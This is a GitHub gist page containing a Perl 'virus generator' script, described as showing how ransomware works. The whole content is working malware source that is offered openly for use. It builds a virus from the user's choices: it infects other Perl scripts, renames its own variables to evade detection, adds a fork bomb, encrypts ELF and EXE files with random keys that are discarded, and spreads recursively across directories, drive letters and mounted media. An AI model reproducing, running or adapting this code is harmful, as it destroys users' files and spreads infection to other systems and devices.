Skip to content

Instantly share code, notes, and snippets.

@vbhs vbhs/Rensomware.pl
Created Jan 25, 2018

Embed
What would you like to do?
We have a script explain how Ransomwares work with programming language Perl
#!/usr/bin/perl
# Perl Virus Generator
####### Strings
$header = <<'HEADER' ;
###################################################
############## Perl Virus Generator ###############
################## by 0BtemOs Touhami##############
###################################################
While generating, you will be asked a few questions
y = YES, n = NO
###################################################
HEADER
$code = << 'CODE' ;
#!/usr/bin/perl
# generated by 0BtemOs Touhami [Touhami Kasbaoui]
@case = ("A".."Z","a".."z","0".."9"); # for rand Strings
&0btouvb ( ) ;
sub 0btouvb
{
CODE
$codeB = "}\n# This is the end, my friend\n" ;
$polyC = << 'polyC' ;
&varChange ( ) ;
sub varChange # Polymorphism through varchanging
{ # for rand Strings
@change = ("0btouvb", "perlInfect", "case", "call", "file", "newdata", "target", "isInfected", "data", "dirs", "varChange", "varib", "count", "myself", "line", "day" , "dayMonth" ,"dayOfWeek", "webInfect", "payloadText", "web");
@varib;
for ($count = 0;$count < scalar(@change); $count++)
{
$varib[$count] = $case[int(rand(52))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))];
}
open(0btouvb, "<", "$0");
@0btouvb = <0btouvb>;
close(0btouvb);
open(0btouvb, ">", "$0");
foreach $line (@0btouvb)
{
for($count = 0; $count < scalar(@change); $count++)
{
while ($line =~ /$change[$count]/)
{
$line =~ s/$change[$count]/$varib[$count]/;
}
}
print 0btouvb $line;
}
close(0btouvb);
}
polyC
$infectC = << 'infectC' ;
&perlInfect ( ) ;
sub perlInfect { # Infect Perl Files
$call = $case[int(rand(52))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))];
foreach $pl ( glob("*.pl") ) {
if ( isInfected($pl) == 0) {
open(me, $0);
open(target, "<", "$pl");
$_ = <target>;
@first = split('\n', $_);
$_ = <target>;
$new = $1 . $first[0] . " \n\&$call\(\)\n" . $_; # Set infectionmark
while ( <target> ) { $new = $new . $_; }
seek(me, 0, 0);
while ( <me> ne "sub viri\{\n" ) { };
$new = $new . "\nsub $call\{\n";
while ( <me> ) { $new = $new . $_; }
close(target);
open(target, ">", $pl);
print target $new;
close(target);
close(me);
}
}
}
sub isInfected{ # Check for infection ( Infectionmark == 15 x space in the first line )
$file = $_[0];
open(pl, "<", $file);
@perl = <pl>;
close(pl);
return $perl[0] =~ / /;
}
infectC
$cryptC = << 'cryptC' ;
use Crypt::CBC ;
&encrypt ( ) ;
sub encrypt # encrypt every ELF or *.exe file with a random key
{
foreach $file ( glob ( "*" ) )
{
open ( file, "<", "$file" ) ;
@data = <file> ;
close ( file ) ;
if ( ($data[0] =~ /ELF/ || $file =~ /\.exe?/) && -w $file )
{
$key = "" ;
for ( $i = 1; $i < int ( rand (20) ) + 2; $i ++ )
{
$key .= $case[int ( rand (62) )] ;
}
$crypt = Crypt::CBC -> new ( -key => $key, -crypher => 'Twofish' ) ;
$crypt -> start ( 'encrypting' ) ;
open ( F, "$file" ) ;
while ( read ( F, $buffer, 1024 ) )
{
$enc .= $crypt -> crypt ( $buffer ) ;
}
$enc .= $crypt -> finish ;
open ( file , ">", "$file" ) ;
print file $enc ;
close ( file ) ;
}
}
}
cryptC
$forkC = "fork while fork\n" ;
$rekInfectA = << 'rekInfectA' ;
&foldInfect ( ) ;
sub foldInfect
{
chdir('../../../../../../../../../../..'); # run Payload through every folder
foreach $dirs ( <*> )
{
if ((-r $dirs) && (-w $dirs) && (-d $dirs))
{
chdir($dirs);
rekInfectA
$rekInfectB = << 'rekInfectB' ;
&foldInfect();
chdir('..');
}
}
if ($^O =~ "Win") # If OS == Win
{
foreach (A..Z) # infect USB and other partitions on Win & Linux
{
if ( chdir($_.'://') ) # Infect every device
{
chdir($_.'://');
&foldInfect();
}
}
}
if ($^O =~ "linux") # If OS == Linux
{
chdir('/media'); # Infect every device
&foldInfect();
}
}
rekInfectB
####### End Strings
####### Functions
sub askPoly
{
&header ( ) ;
print "Should your virus be polymorph?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will be polymorph\n" ;
&header ( ) ;
return $polyC ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus won't be polymorph\n" ;
&header ( ) ;
return "" ;
}
else
{
&askPoly ( ) ;
}
}
sub askInfect
{
&header ( ) ;
print "Should your virus infect other perl files?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will infect other perl files\n" ;
&header ( ) ;
return 1 ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus won't infect other perl files\n" ;
&header ( ) ;
return 0 ;
}
else
{
&askInfect ( ) ;
}
}
sub askFork
{
&header ( ) ;
print "Should your virus be a forkbomb?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will be a forkbomb\n" ;
&header ( ) ;
return $forkC ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus won't be a forkbomb\n" ;
&header ( ) ;
return "" ;
}
else
{
&askFork ( ) ;
}
}
sub askCrypt
{
&header ( ) ;
print "Should your virus encrypt ELF and EXE files?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will encrypt ELF and EXE files\n" ;
&header ( ) ;
return 1 ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus won't encrypt ELF and EXE files\n" ;
&header ( ) ;
return 0 ;
}
else
{
&askCrypt ( ) ;
}
}
sub askFoldInfect
{
&header ( ) ;
print "Should your virus infect in every directory (y) or just in the current (n)?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will infect every directory\n" ;
&header ( ) ;
return "&perlInfect ( ) ;\n" ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus will only infect the current directory\n" ;
&header ( ) ;
return "" ;
}
else
{
&askFoldInfect ( ) ;
}
}
sub askFoldCrypt
{
&header ( ) ;
print "Should your virus crypt files in every directory (y) or just in the current (n)?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will crypt files in every directory\n" ;
&header ( ) ;
return "&encrypt ( ) ;\n" ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus will only crypt files in the current directory\n" ;
&header ( ) ;
return "" ;
}
else
{
&askFoldCrypt ( ) ;
}
}
sub askFileName
{
&header ( ) ;
print "Type the filename of your virus (without \".pl\")!\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a ne "" )
{
$header .= "Your virus will be called " . $a . ".pl\n" ;
&header ;
return $a . ".pl" ;
}
else
{
&askFileName ( ) ;
}
}
sub askVarchange
{
&header ( ) ;
print "Should the VarNames be changed, before creating the virus?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "The VarNames will be changed\n" ;
&header ( ) ;
return 1 ;
}
elsif ( $a eq "n" )
{
$header .= "The VarNames won't be changed\n" ;
&header ( ) ;
return 0 ;
}
else
{
&askVarchange ( ) ;
}
}
sub poly
{
@case = ("A".."Z","a".."z","0".."9"); # for rand Strings
@change = ("0btouvb", "perlInfect", "case", "call", "file", "newdata", "target", "isInfected", "data", "dirs", "varChange", "varib", "count", "myself", "line", "day" , "dayMonth" ,"dayOfWeek", "webInfect", "payloadText", "web"); # Vars to change
@varib;
for ($count = 0;$count < scalar(@change); $count++)
{
$varib[$count] = $case[int(rand(52))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))];
}
open(0btouvb, "<", "$filename");
@0btouvb = <0btouvb>;
close(0btouvb);
open(0btouvb, ">", "$filename");
foreach $line (@0btouvb)
{
for($count = 0; $count < scalar(@change); $count++)
{
while ($line =~ /$change[$count]/)
{
$line =~ s/$change[$count]/$varib[$count]/;
}
}
print 0btouvb $line;
}
close(0btouvb);
}
sub clear
{
system ( clear ) ;
system ( cls ) ;
}
sub header
{
clear ( ) ;
print $header ;
}
####### End Functions
print $header ;
$code .= &askPoly ( ) ;
$aInfect = &askInfect ( ) ;
if ( $aInfect == 1 ) { $code .= $infectC ; }
$code .= &askFork ( ) ;
$aCrypt = &askCrypt ( ) ;
if ( $aCrypt == 1 ) { $code .= $cryptC ; }
if ( $aInfect == 1 || $aCrypt == 1 )
{
$code .= $rekInfectA ;
if ( $aInfect == 1 ) { $code .= &askFoldInfect ( ) ; }
if ( $aCrypt == 1 ) { $code .= &askFoldCrypt ( ) ; }
$code .= $rekInfectB ;
}
$code .= $codeB ;
$filename = &askFileName ( ) ;
open ( file, ">", "$filename" ) ;
print file $code ;
close file ;
if ( &askVarchange ( ) == 1 )
{
&poly ( ) ;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.